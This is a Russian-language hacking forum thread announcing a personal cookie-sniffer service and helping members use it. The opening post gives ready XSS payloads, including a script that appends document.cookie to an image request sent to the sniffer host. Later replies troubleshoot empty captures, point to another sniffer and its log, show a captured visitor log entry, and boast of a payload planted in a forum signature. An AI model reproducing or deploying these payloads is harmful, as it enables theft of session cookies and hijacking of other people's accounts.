На античате не работает, да и вообще в рунете не видел персональных - решил восстановить старый. На этот раз все будет тип-топ, т.к уже на своем серваке все Как узнать адрес моего персонального сниффера? Адрес вашего снифера – http://s.netsec.ru/Ваш_Логин.gif (Обратие внимание на регистр!) Как им воспользоваться? Простой вызов по ссылке: HTML: <a href="http://s.netsec.ru/mda.gif?test">click me</a> Вызов как картинки: HTML: <img src="http://s.netsec.ru/mda.gif"> Вызов из скрипта: HTML: <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> Обратите внимание на знак ? после mda.gif. На сниффере есть ограничение – 5000 записей. Поэтому регулярно следите за забитостью аккуанта, иначе вы можете не получить новых записей. Как применить? Читайте [thread=19610]карту раздела статьи[/thread] [thread=19610]Дал ссылку, поставил аватару, поставил как фон , а поле стринг пустое[/thread] Адрес – http://s.netsec.ru Регистрация нового – http://s.netsec.ru/?act=reg
После того как положили кое что на спамхаус, который грозился внести ИП сервера в блеки, но все равно внес хтя мы выполнили все их условия =) прикрутил домен назад, сниффер опять работает..
TrON, на античате он не работает уже чёрт знает сколько, там только log.php работает если я не прав, то ткни меня носом =) GreenBear, благодарю за скиффку, теперь сухо и тепло =)
Тыкаю тебя носом. надо мозгами немнога пошевелить и въехал бы... Сам снифак находится на http://OLD.antichat.ru/cgi-bin/s.jpg а лог на http://old.antichat.ru/sniff/log.php ------------ в странице лог просто указан не тот адрес да и все. Спокойно юзаю этот сниффер.
парень, тебе говорят не про этот сниффер, а про "личный" http://antichat.org/sniffer - про него тебе и говорю, что он не пашет. А тот, что ты мне показал, можно конечно поюзать его, но я не хочу, ибо личный удобнее. Понятно о чём речь идёт? Сначала сам мозгами пошевели
слушай,а куки где?у меня только вот что пришло ------------------ Time: 24.06 -10.58.39 IP: 83.234.212.36 Host: Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.8 (build 01709)) String: --------------- что это мне может дать?что вообще может дать ай-пи?
похоже на то, что кто-то (может ты) просто запустил файл картинки. Или запрос составлен неверно. У мну все форцает.
Как проверить работает ли снифер если мои куки в найденной xss не улетают, или пустое окно или слова document.cookie ? Использую http://s.netsec.ru
Пацаны, ко мне куки вабще не приходят. Только IP, хост, и информация да и пустое поле String. Написал все как надо и добавил +document.cookie, только чего то их нет.
Все пашет, надо в правильно виде ссылку давать. Например в ГТЧате может не пахать, т.к. там стоит редирект, соттвественно ты вылазишь неизвестно куда, а потом от этого неизвестно куда уже на сниф, соотв-но и не приходит ничего. Так по крайней мере у нас в чате. Зато на форуме, внедренный в подпись куки шлет только так ))))
Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения) <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> Р.S. мои сообщения читают там где я их шлю))
